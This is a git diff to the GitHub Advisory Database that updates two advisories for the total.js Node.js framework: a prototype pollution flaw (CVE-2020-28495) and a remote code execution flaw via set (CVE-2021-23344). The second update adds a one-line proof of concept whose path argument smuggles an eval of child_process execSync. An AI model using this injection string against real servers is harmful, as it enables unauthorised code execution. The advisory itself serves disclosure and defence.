diff --git a/advisories/github-reviewed/2021/02/GHSA-6cf8-qhqj-vjqm/GHSA-6cf8-qhqj-vjqm.json b/advisories/github-reviewed/2021/02/GHSA-6cf8-qhqj-vjqm/GHSA-6cf8-qhqj-vjqm.json index 8b3a296db21..ff9dc1be0d1 100644 --- a/advisories/github-reviewed/2021/02/GHSA-6cf8-qhqj-vjqm/GHSA-6cf8-qhqj-vjqm.json +++ b/advisories/github-reviewed/2021/02/GHSA-6cf8-qhqj-vjqm/GHSA-6cf8-qhqj-vjqm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6cf8-qhqj-vjqm", - "modified": "2021-02-03T07:46:44Z", + "modified": "2023-09-13T20:22:24Z", "published": "2021-02-05T20:43:19Z", "aliases": [ "CVE-2020-28495" @@ -9,7 +9,10 @@ "summary": "Prototype pollution in total.js", "details": "There is a prototype pollution vulnerability in the package total.js before version 3.4.7. The set function can be used to set a value into the object according to the path. However the keys of the path being set are not properly sanitized, leading to a prototype pollution vulnerability. The impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution or Property Injection.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } ], "affected": [ { @@ -17,6 +20,11 @@ "ecosystem": "npm", "name": "total.js" }, + "ecosystem_specific": { + "affected_functions": [ + "" + ] + }, "ranges": [ { "type": "ECOSYSTEM", @@ -64,6 +72,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1321", "CWE-400" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2021/03/GHSA-3wj8-vp9h-rm6m/GHSA-3wj8-vp9h-rm6m.json b/advisories/github-reviewed/2021/03/GHSA-3wj8-vp9h-rm6m/GHSA-3wj8-vp9h-rm6m.json index f25046a27e3..b23cf84befd 100644 --- a/advisories/github-reviewed/2021/03/GHSA-3wj8-vp9h-rm6m/GHSA-3wj8-vp9h-rm6m.json +++ b/advisories/github-reviewed/2021/03/GHSA-3wj8-vp9h-rm6m/GHSA-3wj8-vp9h-rm6m.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-3wj8-vp9h-rm6m", - "modified": "2021-03-12T22:42:43Z", + "modified": "2023-09-13T20:23:10Z", "published": "2021-03-19T21:32:20Z", "aliases": [ "CVE-2021-23344" ], - "summary": "Remote Code Execution (RCE)", - "details": "The package total.js before 3.4.8 are vulnerable to Remote Code Execution (RCE) via set.", + "summary": "total.js Remote Code Execution Vulnerability", + "details": "total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.\n\n### PoC\n```js\n// To be run in a nodejs console: \nrequire('total.js/utils').set({}, 'a;eval(`require(\"child_process\")\\\\x2eexecSync(\"touch pwned\")`);//')\n```", "severity": [ { "type": "CVSS_V3", @@ -20,6 +20,11 @@ "ecosystem": "npm", "name": "total.js" }, + "ecosystem_specific": { + "affected_functions": [ + "" + ] + }, "ranges": [ { "type": "ECOSYSTEM",